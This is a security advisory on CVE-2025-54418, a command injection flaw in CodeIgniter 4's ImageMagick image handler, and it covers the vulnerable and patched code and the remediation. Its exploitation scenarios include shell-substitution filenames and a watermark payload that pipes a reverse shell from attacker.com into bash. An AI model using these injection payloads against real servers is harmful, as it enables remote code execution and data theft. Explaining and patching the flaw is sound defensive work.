CVE-2025-54418: Remote Code Execution in CodeIgniter 4 ImageMagick Handler

CodeIgniter 4, a popular PHP web application framework, provides an image manipulation library that supports multiple handlers, including GD (using PHP's extension) and ImageMagick (invoking external binaries). CVE-2025-54418 identifies a critical flaw in the ImageMagickHandler class.

When configured to use ImageMagick, the framework constructs shell commands to invoke binaries such as convert or mogrify. The vulnerability arises because user-controlled data—specifically source filenames, destination paths, and text annotation parameters—are concatenated directly into these command strings without adequate escaping.

This lack of sanitization allows an attacker to inject shell metacharacters. If an application using CodeIgniter 4 processes a file with a malicious name or accepts user input for image text overlays, the attacker can break out of the intended command structure and execute arbitrary operating system commands with the privileges of the web server process (typically www-data).

The root cause of CVE-2025-54418 is Improper Neutralization of Special Elements used in an OS Command (CWE-78) within system/Images/Handlers/ImageMagickHandler.php. The handler constructs command lines by wrapping variables in quotes manually rather than using PHP's built-in safety functions like escapeshellarg().

Double-Quote Injection: In the _resize() method, variables were wrapped in double quotes ("). In Unix-like shell environments, text inside double quotes is still subject to variable expansion ($VAR) and command substitution (backticks ` or $(...)). This means that even if a filename is quoted, if it contains backticks, the shell will execute the content inside them before running the main command.

Breakout Injection: In the _text() method, used for adding text overlays to images, parameters were concatenated with insufficient validation. This allowed attackers to use characters like semicolons (;), pipes (|), or ampersands (&) to terminate the ImageMagick command and start a new, malicious command. The framework failed to treat these inputs strictly as data, inadvertently allowing them to be interpreted as code by the system shell.

The following analysis highlights the critical changes in system/Images/Handlers/ImageMagickHandler.php. The patch replaces manual string concatenation with robust argument escaping.

Vulnerable Code (Simplified):

// PRE-PATCH: Manual quoting allows injection
$cmd = $this->binaryPath . ' "' . $this->source . '" -resize ...';
 
// If $this->source is "image`id`.png", the shell sees:
// convert "image`id`.png" -resize ...
// The `id` command executes immediately.

Patched Code:

// POST-PATCH (v4.6.2): uses escapeshellarg()
// This function adds single quotes around the string and quotes/escapes 
// any existing single quotes, ensuring the shell treats it purely as a string.
 
$cmd = escapeshellcmd($this->binaryPath) . ' ' . 
       escapeshellarg($this->source) . ' -resize ...';
 
// If $this->source is "image`id`.png", the shell sees:
// convert 'image`id`.png' -resize ...
// The backticks are treated as literal characters in the filename.

The fix ensures that no matter what characters are present in the filename or text options, they are treated strictly as arguments to the convert binary, effectively neutralizing the command injection vector.

Exploitation of this vulnerability requires the attacker to control either the filename processed by the image handler or the text content used in an annotation. No authentication is required if the image processing endpoint is public.

Scenario 1: Malicious Filename (Command Substitution)

1. Preparation: The attacker names a valid image file image$(whoami).jpg or imageid.png.
2. Upload: The file is uploaded to the target application.
3. Trigger: The application invokes the image manipulation library to resize or crop the image.
4. Execution: When ImageMagickHandler constructs the command, the shell executes whoami or id. The output might be embedded in the error log or the resulting filename, confirming RCE.

Scenario 2: Text Annotation (Command Chaining)

1. Vector: The application has a feature allowing users to watermark images with custom text.
2. Payload: The attacker inputs a string like: Watermark"; curl http://attacker.com/revshell | bash; echo ".
3. Execution: The handler constructs a command line like: convert source.jpg -draw "text 0,0 'Watermark"; curl ... The shell interprets the quote and semicolon, breaking out of the -draw argument and executing the reverse shell payload.

The impact of CVE-2025-54418 is Critical. Successful exploitation grants the attacker the ability to execute arbitrary code on the server.

Confidentiality: Attackers can read sensitive files, including application configuration (database credentials, API keys) and user data.

Integrity: Attackers can modify application source code, inject persistent backdoors, or alter data in the database.

Availability: Attackers can delete files, crash services, or use the server as part of a botnet (e.g., for DDoS attacks), causing denial of service.

Since the web server user typically has network access, this often serves as a foothold for lateral movement within the internal network. The vulnerability is particularly dangerous because it can be triggered by seemingly harmless actions like uploading a profile picture.

The primary remediation is to upgrade the framework immediately. If an upgrade is not feasible, configuration changes can temporarily mitigate the risk.

Official Patch: Upgrade to CodeIgniter 4.6.2 or later. This version implements escapeshellarg() across the ImageMagickHandler class to sanitize all inputs passed to the shell.

Workaround (Switch Handlers): Change the image handling configuration to use the GD library instead of ImageMagick. The GD handler uses PHP's internal extension (gd) and does not invoke external shell commands, rendering this specific injection vector inert.

Modify app/Config/Images.php:

public $defaultHandler = 'gd'; // Change from 'imagick'

Defense in Depth:

• Sanitize Filenames: Ensure uploaded files are renamed to a random string (e.g., UUID) before processing. Never pass user-supplied filenames directly to filesystem operations.
• Restrict ImageMagick: Configure policy.xml in ImageMagick to disable dangerous delegates and coders (e.g., MVG, MSL, EPHEMERAL, URL).